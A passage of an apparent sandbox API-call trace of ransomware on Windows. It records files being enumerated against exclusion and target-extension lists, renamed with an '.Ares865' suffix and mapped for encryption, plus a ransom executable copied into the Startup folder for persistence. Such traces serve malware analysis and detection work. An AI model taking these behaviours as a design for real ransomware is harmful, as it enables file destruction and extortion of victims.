(lpString1="lnk", lpString2="dbt") returned 1 [0092.169] lstrlenW (lpString="dbv") returned 3 [0092.169] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.169] lstrlenW (lpString="dbx") returned 3 [0092.169] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.169] lstrlenW (lpString="dcb") returned 3 [0092.169] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.170] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.170] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk.Ares865") returned 88 [0092.170] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\internet explorer (64-bit).lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\internet explorer (64-bit).lnk.ares865"), dwFlags=0x1) returned 1 [0092.171] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\internet explorer (64-bit).lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.172] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1419) returned 1 [0092.172] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.172] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.172] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0092.172] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0092.173] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.173] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0092.173] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x890, lpName=0x0) returned 0x15c [0092.174] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x890) returned 0x190000 [0092.243] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0092.244] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.244] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0092.244] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.244] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.244] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.244] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.244] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.244] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.244] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.245] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.245] CloseHandle (hObject=0x15c) returned 1 [0092.245] CloseHandle (hObject=0x118) returned 1 [0092.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0092.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.245] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d7ae880, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x5ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer.lnk", cAlternateFileName="INTERN~1.LNK")) returned 1 [0092.245] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.245] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="aoldtz.exe") returned 1 [0092.245] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2=".") returned 1 [0092.245] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="..") returned 1 [0092.245] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="windows") returned -1 [0092.245] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="bootmgr") returned 1 [0092.245] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="temp") returned -1 [0092.245] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="pagefile.sys") returned -1 [0092.245] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="boot") returned 1 [0092.246] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ids.txt") returned 1 [0092.246] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="ntuser.dat") returned -1 [0092.246] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="perflogs") returned -1 [0092.246] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2="MSBuild") returned -1 [0092.246] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0092.246] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Internet Explorer (64-bit).lnk") returned 80 [0092.246] lstrcpyW (in: lpString1=0x2cce464, lpString2="Internet Explorer.lnk" | out: lpString1="Internet Explorer.lnk") returned="Internet Explorer.lnk" [0092.246] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0092.246] lstrlenW (lpString="Ares865") returned 7 [0092.246] lstrcmpiW (lpString1="rer.lnk", lpString2="Ares865") returned 1 [0092.246] lstrlenW (lpString=".dll") returned 4 [0092.246] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2=".dll") returned 1 [0092.246] lstrlenW (lpString=".lnk") returned 4 [0092.246] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2=".lnk") returned 1 [0092.246] lstrlenW (lpString=".ini") returned 4 [0092.246] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2=".ini") returned 1 [0092.246] lstrlenW (lpString=".sys") returned 4 [0092.246] lstrcmpiW (lpString1="Internet Explorer.lnk", lpString2=".sys") returned 1 [0092.246] lstrlenW (lpString="Internet Explorer.lnk") returned 21 [0092.246] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Internet Explorer.lnk.Ares865") returned 79 [0092.247] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Internet Explorer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\internet explorer.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Internet Explorer.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\internet explorer.lnk.ares865"), dwFlags=0x1) returned 1 [0092.248] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Internet Explorer.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\internet explorer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.249] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1453) returned 1 [0092.249] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.249] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.249] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0092.249] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0092.250] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.250] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0092.250] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8b0, lpName=0x0) returned 0x15c [0092.251] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8b0) returned 0x190000 [0092.298] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0092.299] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.299] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0092.299] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.299] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.299] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.299] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.299] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.299] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.299] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.302] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.302] CloseHandle (hObject=0x15c) returned 1 [0092.302] CloseHandle (hObject=0x118) returned 1 [0092.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0092.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.302] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0ebd60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0ebd60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Maintenance", cAlternateFileName="MAINTE~1")) returned 1 [0092.302] lstrcmpiW (lpString1="Maintenance", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.302] lstrcmpiW (lpString1="Maintenance", lpString2="aoldtz.exe") returned 1 [0092.302] lstrcmpiW (lpString1="Maintenance", lpString2=".") returned 1 [0092.302] lstrcmpiW (lpString1="Maintenance", lpString2="..") returned 1 [0092.302] lstrcmpiW (lpString1="Maintenance", lpString2="windows") returned -1 [0092.302] lstrcmpiW (lpString1="Maintenance", lpString2="bootmgr") returned 1 [0092.302] lstrcmpiW (lpString1="Maintenance", lpString2="temp") returned -1 [0092.302] lstrcmpiW (lpString1="Maintenance", lpString2="pagefile.sys") returned -1 [0092.302] lstrcmpiW (lpString1="Maintenance", lpString2="boot") returned 1 [0092.302] lstrcmpiW (lpString1="Maintenance", lpString2="ids.txt") returned 1 [0092.302] lstrcmpiW (lpString1="Maintenance", lpString2="ntuser.dat") returned -1 [0092.302] lstrcmpiW (lpString1="Maintenance", lpString2="perflogs") returned -1 [0092.302] lstrcmpiW (lpString1="Maintenance", lpString2="MSBuild") returned -1 [0092.302] lstrlenW (lpString="Maintenance") returned 11 [0092.302] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Internet Explorer.lnk") returned 71 [0092.303] lstrcpyW (in: lpString1=0x2cce464, lpString2="Maintenance" | out: lpString1="Maintenance") returned="Maintenance" [0092.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0092.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x7c) returned 0x2f0518 [0092.303] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0092.303] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0c5c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 1 [0092.303] lstrcmpiW (lpString1="Startup", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.303] lstrcmpiW (lpString1="Startup", lpString2="aoldtz.exe") returned 1 [0092.303] lstrcmpiW (lpString1="Startup", lpString2=".") returned 1 [0092.303] lstrcmpiW (lpString1="Startup", lpString2="..") returned 1 [0092.303] lstrcmpiW (lpString1="Startup", lpString2="windows") returned -1 [0092.303] lstrcmpiW (lpString1="Startup", lpString2="bootmgr") returned 1 [0092.303] lstrcmpiW (lpString1="Startup", lpString2="temp") returned -1 [0092.303] lstrcmpiW (lpString1="Startup", lpString2="pagefile.sys") returned 1 [0092.303] lstrcmpiW (lpString1="Startup", lpString2="boot") returned 1 [0092.303] lstrcmpiW (lpString1="Startup", lpString2="ids.txt") returned 1 [0092.303] lstrcmpiW (lpString1="Startup", lpString2="ntuser.dat") returned 1 [0092.303] lstrcmpiW (lpString1="Startup", lpString2="perflogs") returned 1 [0092.303] lstrcmpiW (lpString1="Startup", lpString2="MSBuild") returned 1 [0092.303] lstrlenW (lpString="Startup") returned 7 [0092.303] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance") returned 61 [0092.303] lstrcpyW (in: lpString1=0x2cce464, lpString2="Startup" | out: lpString1="Startup") returned="Startup" [0092.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0092.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1608 [0092.303] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a70 | out: ListHead=0x2e7710, ListEntry=0x2e7a70) returned 0x2e7a50 [0092.303] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0c5c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 0 [0092.303] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0092.303] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a70 [0092.303] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Startup", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Startup") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Startup" [0092.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0092.303] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0092.303] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Startup") returned 57 [0092.303] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Startup" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Startup") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Startup" [0092.304] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.304] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Startup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\startup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.304] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.304] GetLastError () returned 0x0 [0092.304] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0092.304] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0092.304] CloseHandle (hObject=0x120) returned 1 [0092.305] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0092.305] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0092.305] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Startup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0c5c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0092.305] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.305] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0092.305] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.305] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0c5c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.305] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.305] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.305] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.305] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.305] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0092.305] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.305] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0092.305] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0092.305] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0092.305] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0092.305] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0092.305] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0092.305] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0092.305] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0092.305] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0092.305] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0092.305] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0092.305] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0092.305] lstrlenW (lpString="desktop.ini") returned 11 [0092.305] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Startup\\*") returned 59 [0092.305] lstrcpyW (in: lpString1=0x2cce474, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0092.305] lstrlenW (lpString="desktop.ini") returned 11 [0092.305] lstrlenW (lpString="Ares865") returned 7 [0092.306] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0092.306] lstrlenW (lpString=".dll") returned 4 [0092.306] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0092.306] lstrlenW (lpString=".lnk") returned 4 [0092.306] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0092.306] lstrlenW (lpString=".ini") returned 4 [0092.306] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0092.306] lstrlenW (lpString=".sys") returned 4 [0092.306] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0092.306] lstrlenW (lpString="desktop.ini") returned 11 [0092.306] lstrlenW (lpString="bak") returned 3 [0092.306] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0092.306] lstrlenW (lpString="ba_") returned 3 [0092.306] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0092.306] lstrlenW (lpString="dbb") returned 3 [0092.306] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0092.306] lstrlenW (lpString="vmdk") returned 4 [0092.306] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0092.306] lstrlenW (lpString="rar") returned 3 [0092.306] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0092.306] lstrlenW (lpString="zip") returned 3 [0092.306] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0092.306] lstrlenW (lpString="tgz") returned 3 [0092.306] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0092.306] lstrlenW (lpString="vbox") returned 4 [0092.306] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0092.306] lstrlenW (lpString="vdi") returned 3 [0092.306] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0092.306] lstrlenW (lpString="vhd") returned 3 [0092.306] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0092.306] lstrlenW (lpString="vhdx") returned 4 [0092.306] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0092.306] lstrlenW (lpString="avhd") returned 4 [0092.306] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0092.306] lstrlenW (lpString="db") returned 2 [0092.306] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0092.306] lstrlenW (lpString="db2") returned 3 [0092.307] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0092.307] lstrlenW (lpString="db3") returned 3 [0092.307] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0092.307] lstrlenW (lpString="dbf") returned 3 [0092.307] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0092.307] lstrlenW (lpString="mdf") returned 3 [0092.307] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0092.307] lstrlenW (lpString="mdb") returned 3 [0092.307] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0092.307] lstrlenW (lpString="sql") returned 3 [0092.307] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0092.307] lstrlenW (lpString="sqlite") returned 6 [0092.307] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0092.307] lstrlenW (lpString="sqlite3") returned 7 [0092.307] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0092.307] lstrlenW (lpString="sqlitedb") returned 8 [0092.307] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0092.307] lstrlenW (lpString="xml") returned 3 [0092.307] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0092.307] lstrlenW (lpString="$er") returned 3 [0092.307] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0092.307] lstrlenW (lpString="4dd") returned 3 [0092.307] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0092.307] lstrlenW (lpString="4dl") returned 3 [0092.307] lstrcmpiW (lpString1="ini", 